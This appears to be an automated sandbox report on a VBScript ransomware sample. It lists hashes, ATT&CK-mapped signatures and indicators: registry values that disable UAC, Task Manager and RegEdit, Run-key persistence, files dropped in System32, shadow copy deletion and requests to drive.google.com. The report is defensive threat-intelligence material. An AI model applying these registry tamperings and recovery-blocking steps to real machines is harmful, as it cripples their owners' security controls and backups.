c37651558d3b87df699354c3d54af3a6958ab7f9a4810387e5fbea1e58bf20cf

Analysis

max time kernel
300s
max time network
188s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
24-10-2024 09:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ransom.Win32.LCrypt0rX.A/LCrypt0rX.vbs
Size

19KB
MD5

5e95d5012a68cd521e499869f432d41a
SHA1

5225377f6e3f634dc10f37e727d39dce5b3425fc
SHA256

150d5a11d4d5ee4ce4c41b63210e14bdbc80da07b0a7249f58de4e3bef7819bf
SHA512

b0d39ddd55248cef9b95a16198a198f7f5e478e664691b663e04453c5f5eaa87f8d55d98d3df4b228464fad9021c05e9060b40e2d770962bc117b62314544c23
SSDEEP

384:tDYbplStxYHQHSH7l+iijqF2ZNvz1wj9byX+EkO:lqMK2N+EX

Score

10^/10

defense_evasion discovery evasion execution impact persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2336	wscript.exe
5	2336	wscript.exe
8	2336	wscript.exe

Blocks application from running via registry modification 3 IoCs

Adds application to list of disallowed applications.

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1"	wscript.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "msconfig.exe"	wscript.exe

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	wscript.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyStartupScript = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransom.Win32.LCrypt0rX.A\\LCrypt0rX.vbs"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\iamthedoom = "C:\\Windows\\System32\\iamthedoom.bat"	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpamScript = "C:\\Windows\\System32\\haha.vbs"	wscript.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\System32\iamthedoom.bat	wscript.exe
File opened for modification	C:\Windows\System32\iamthedoom.bat	wscript.exe
File created	C:\Windows\System32\haha.vbs	wscript.exe
File opened for modification	C:\Windows\System32\haha.vbs	wscript.exe
File created	C:\Windows\System32\wins32bugfix.vbs	wscript.exe
File opened for modification	C:\Windows\System32\wins32bugfix.vbs	wscript.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\gcrybground.png"	wscript.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
31432	notepad.exe
32608	notepad.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1864	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
19964	Process not Found
20868	Process not Found
3912	taskkill.exe
11368	taskkill.exe
29304	taskkill.exe
32092	Process not Found
16876	Process not Found
11244	taskkill.exe
18328	taskkill.exe
20836	taskkill.exe
28452	Process not Found
2884	taskkill.exe
27036	taskkill.exe
2168	Process not Found
28804	taskkill.exe
10120	taskkill.exe
22232	Process not Found
11724	Process not Found
33276	Process not Found
17716	taskkill.exe
12540	taskkill.exe
20564	taskkill.exe
26992	Process not Found
14668	taskkill.exe
6560	Process not Found
33616	Process not Found
5628	Process not Found
7148	taskkill.exe
11600	taskkill.exe
17604	taskkill.exe
28644	Process not Found
18160	taskkill.exe
23864	taskkill.exe
32736	taskkill.exe
33460	Process not Found
5896	Process not Found
15088	taskkill.exe
24384	taskkill.exe
29500	taskkill.exe
25992	Process not Found
23664	Process not Found
21624	taskkill.exe
26184	taskkill.exe
23568	Process not Found
1940	taskkill.exe
14816	taskkill.exe
13832	taskkill.exe
26804	taskkill.exe
18708	taskkill.exe
3900	Process not Found
17840	taskkill.exe
7992	taskkill.exe
23808	Process not Found
1960	taskkill.exe
5568	taskkill.exe
7104	taskkill.exe
24364	Process not Found
12220	Process not Found
25476	Process not Found
23604	Process not Found
7708	Process not Found
20040	Process not Found
24832	Process not Found
18480	Process not Found

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\MACHINE\Control Panel\Mouse	wscript.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop	wscript.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = c083d31cf625db01	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4D241AD1-91E9-11EF-9D9F-E67A421F41DB} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4D04EA71-91E9-11EF-9D9F-E67A421F41DB} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4CE99A41-91E9-11EF-9D9F-E67A421F41DB} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4D47D741-91E9-11EF-9D9F-E67A421F41DB} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe

Opens file in notepad (likely ransom note) 30 IoCs

ransomware

pid	Process
3916	notepad.exe
27680	notepad.exe
5020	notepad.exe
23808	Process not Found
4684	notepad.exe
33736	Process not Found
34244	Process not Found
22972	Process not Found
11916	Process not Found
32424	Process not Found
3920	notepad.exe
5900	notepad.exe
16636	notepad.exe
6316	notepad.exe
31432	notepad.exe
2900	notepad.exe
32608	notepad.exe
17872	Process not Found
7448	Process not Found
23388	Process not Found
10028	notepad.exe
33576	Process not Found
4132	notepad.exe
4696	notepad.exe
13916	notepad.exe
5100	notepad.exe
32496	Process not Found
20620	notepad.exe
1620	Process not Found
31928	Process not Found

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	5	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	8	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of AdjustPrivilegeToken 20 IoCs

description	pid	Process
Token: SeBackupPrivilege	1624	vssvc.exe
Token: SeRestorePrivilege	1624	vssvc.exe
Token: SeAuditPrivilege	1624	vssvc.exe
Token: SeDebugPrivilege	2884	taskkill.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeDebugPrivilege	3912	taskkill.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	4932	taskkill.exe
Token: SeDebugPrivilege	5280	taskkill.exe
Token: SeDebugPrivilege	1960	taskkill.exe
Token: SeDebugPrivilege	7148	taskkill.exe
Token: SeDebugPrivilege	10804	taskkill.exe
Token: SeDebugPrivilege	11016	taskkill.exe
Token: SeDebugPrivilege	11244	taskkill.exe
Token: SeDebugPrivilege	10804	taskkill.exe
Token: SeDebugPrivilege	11244	taskkill.exe
Token: SeDebugPrivilege	11368	taskkill.exe
Token: SeDebugPrivilege	11600	taskkill.exe
Token: SeDebugPrivilege	5568	taskkill.exe
Token: SeDebugPrivilege	14544	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1296	iexplore.exe
1296	iexplore.exe
1956	iexplore.exe
1956	iexplore.exe
1864	iexplore.exe
1864	iexplore.exe
2412	iexplore.exe
2412	iexplore.exe
2076	iexplore.exe
2076	iexplore.exe
2756	iexplore.exe
2756	iexplore.exe
2936	iexplore.exe
2936	iexplore.exe
1732	iexplore.exe
1732	iexplore.exe
1956	iexplore.exe
1956	iexplore.exe
1956	iexplore.exe
1956	iexplore.exe
1864	iexplore.exe
1864	iexplore.exe
1864	iexplore.exe
1864	iexplore.exe
1956	iexplore.exe
1956	iexplore.exe
1864	iexplore.exe
1864	iexplore.exe
1732	iexplore.exe
1732	iexplore.exe
1732	iexplore.exe
1732	iexplore.exe
1296	iexplore.exe
1296	iexplore.exe
1296	iexplore.exe
1296	iexplore.exe
1732	iexplore.exe
1732	iexplore.exe
1296	iexplore.exe
1296	iexplore.exe
2936	iexplore.exe
2936	iexplore.exe
2936	iexplore.exe
2936	iexplore.exe
2076	iexplore.exe
2076	iexplore.exe
2076	iexplore.exe
2076	iexplore.exe
2936	iexplore.exe
2936	iexplore.exe
2076	iexplore.exe
2756	iexplore.exe
2076	iexplore.exe
2756	iexplore.exe
2756	iexplore.exe
2756	iexplore.exe
2412	iexplore.exe
2412	iexplore.exe
2412	iexplore.exe
2412	iexplore.exe
2756	iexplore.exe
2756	iexplore.exe
2412	iexplore.exe
2412	iexplore.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
2664	mspaint.exe
2772	mspaint.exe
876	mspaint.exe
3036	mspaint.exe
1504	iexplore.exe
1504	iexplore.exe
2936	iexplore.exe
2076	iexplore.exe
2936	iexplore.exe
2076	iexplore.exe
560	iexplore.exe
560	iexplore.exe
1996	iexplore.exe
1996	iexplore.exe
1732	iexplore.exe
2292	iexplore.exe
2292	iexplore.exe
1648	iexplore.exe
1648	iexplore.exe
1732	iexplore.exe
2756	iexplore.exe
2756	iexplore.exe
2784	iexplore.exe
2784	iexplore.exe
2412	iexplore.exe
2412	iexplore.exe
1864	iexplore.exe
1864	iexplore.exe
2972	iexplore.exe
2972	iexplore.exe
3048	iexplore.exe
2980	iexplore.exe
2400	iexplore.exe
484	iexplore.exe
3048	iexplore.exe
2980	iexplore.exe
2400	iexplore.exe
484	iexplore.exe
876	mspaint.exe
3036	mspaint.exe
2664	mspaint.exe
2772	mspaint.exe
1296	iexplore.exe
1956	iexplore.exe
1296	iexplore.exe
1956	iexplore.exe
3820	mspaint.exe
3036	mspaint.exe
3036	mspaint.exe
3820	mspaint.exe
876	mspaint.exe
876	mspaint.exe
2772	mspaint.exe
2772	mspaint.exe
2664	mspaint.exe
3820	mspaint.exe
3820	mspaint.exe
2664	mspaint.exe
1556	iexplore.exe
1556	iexplore.exe
2088	IEXPLORE.EXE
2088	IEXPLORE.EXE
3604	IEXPLORE.EXE
1828	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2508 wrote to memory of 2336	2508	WScript.exe	30
PID 2508 wrote to memory of 2336	2508	WScript.exe	30
PID 2508 wrote to memory of 2336	2508	WScript.exe	30
PID 2336 wrote to memory of 2068	2336	wscript.exe	31
PID 2336 wrote to memory of 2068	2336	wscript.exe	31
PID 2336 wrote to memory of 2068	2336	wscript.exe	31
PID 2068 wrote to memory of 1864	2068	cmd.exe	33
PID 2068 wrote to memory of 1864	2068	cmd.exe	33
PID 2068 wrote to memory of 1864	2068	cmd.exe	33
PID 2336 wrote to memory of 2900	2336	wscript.exe	36
PID 2336 wrote to memory of 2900	2336	wscript.exe	36
PID 2336 wrote to memory of 2900	2336	wscript.exe	36
PID 2336 wrote to memory of 2976	2336	wscript.exe	39
PID 2336 wrote to memory of 2976	2336	wscript.exe	39
PID 2336 wrote to memory of 2976	2336	wscript.exe	39
PID 2336 wrote to memory of 1780	2336	wscript.exe	40
PID 2336 wrote to memory of 1780	2336	wscript.exe	40
PID 2336 wrote to memory of 1780	2336	wscript.exe	40
PID 2336 wrote to memory of 2636	2336	wscript.exe	42
PID 2336 wrote to memory of 2636	2336	wscript.exe	42
PID 2336 wrote to memory of 2636	2336	wscript.exe	42
PID 2336 wrote to memory of 2628	2336	wscript.exe	43
PID 2336 wrote to memory of 2628	2336	wscript.exe	43
PID 2336 wrote to memory of 2628	2336	wscript.exe	43
PID 2336 wrote to memory of 2884	2336	wscript.exe	44
PID 2336 wrote to memory of 2884	2336	wscript.exe	44
PID 2336 wrote to memory of 2884	2336	wscript.exe	44
PID 1780 wrote to memory of 2664	1780	cmd.exe	46
PID 1780 wrote to memory of 2664	1780	cmd.exe	46
PID 1780 wrote to memory of 2664	1780	cmd.exe	46
PID 2628 wrote to memory of 2960	2628	wscript.exe	47
PID 2628 wrote to memory of 2960	2628	wscript.exe	47
PID 2628 wrote to memory of 2960	2628	wscript.exe	47
PID 2636 wrote to memory of 2864	2636	wscript.exe	48
PID 2636 wrote to memory of 2864	2636	wscript.exe	48
PID 2636 wrote to memory of 2864	2636	wscript.exe	48
PID 1780 wrote to memory of 560	1780	cmd.exe	50
PID 1780 wrote to memory of 560	1780	cmd.exe	50
PID 1780 wrote to memory of 560	1780	cmd.exe	50
PID 1780 wrote to memory of 2076	1780	cmd.exe	51
PID 1780 wrote to memory of 2076	1780	cmd.exe	51
PID 1780 wrote to memory of 2076	1780	cmd.exe	51
PID 1780 wrote to memory of 1656	1780	cmd.exe	52
PID 1780 wrote to memory of 1656	1780	cmd.exe	52
PID 1780 wrote to memory of 1656	1780	cmd.exe	52
PID 1780 wrote to memory of 2936	1780	cmd.exe	53
PID 1780 wrote to memory of 2936	1780	cmd.exe	53
PID 1780 wrote to memory of 2936	1780	cmd.exe	53
PID 1780 wrote to memory of 1504	1780	cmd.exe	54
PID 1780 wrote to memory of 1504	1780	cmd.exe	54
PID 1780 wrote to memory of 1504	1780	cmd.exe	54
PID 1780 wrote to memory of 2756	1780	cmd.exe	55
PID 1780 wrote to memory of 2756	1780	cmd.exe	55
PID 1780 wrote to memory of 2756	1780	cmd.exe	55
PID 1780 wrote to memory of 2772	1780	cmd.exe	56
PID 1780 wrote to memory of 2772	1780	cmd.exe	56
PID 1780 wrote to memory of 2772	1780	cmd.exe	56
PID 1780 wrote to memory of 1864	1780	cmd.exe	57
PID 1780 wrote to memory of 1864	1780	cmd.exe	57
PID 1780 wrote to memory of 1864	1780	cmd.exe	57
PID 1780 wrote to memory of 2292	1780	cmd.exe	58
PID 1780 wrote to memory of 2292	1780	cmd.exe	58
PID 1780 wrote to memory of 2292	1780	cmd.exe	58
PID 1780 wrote to memory of 2688	1780	cmd.exe	59

System policy modification 1 TTPs 16 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\TaskMgrMessage = "Task Manager has been disabled by your administrator."	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	wscript.exe
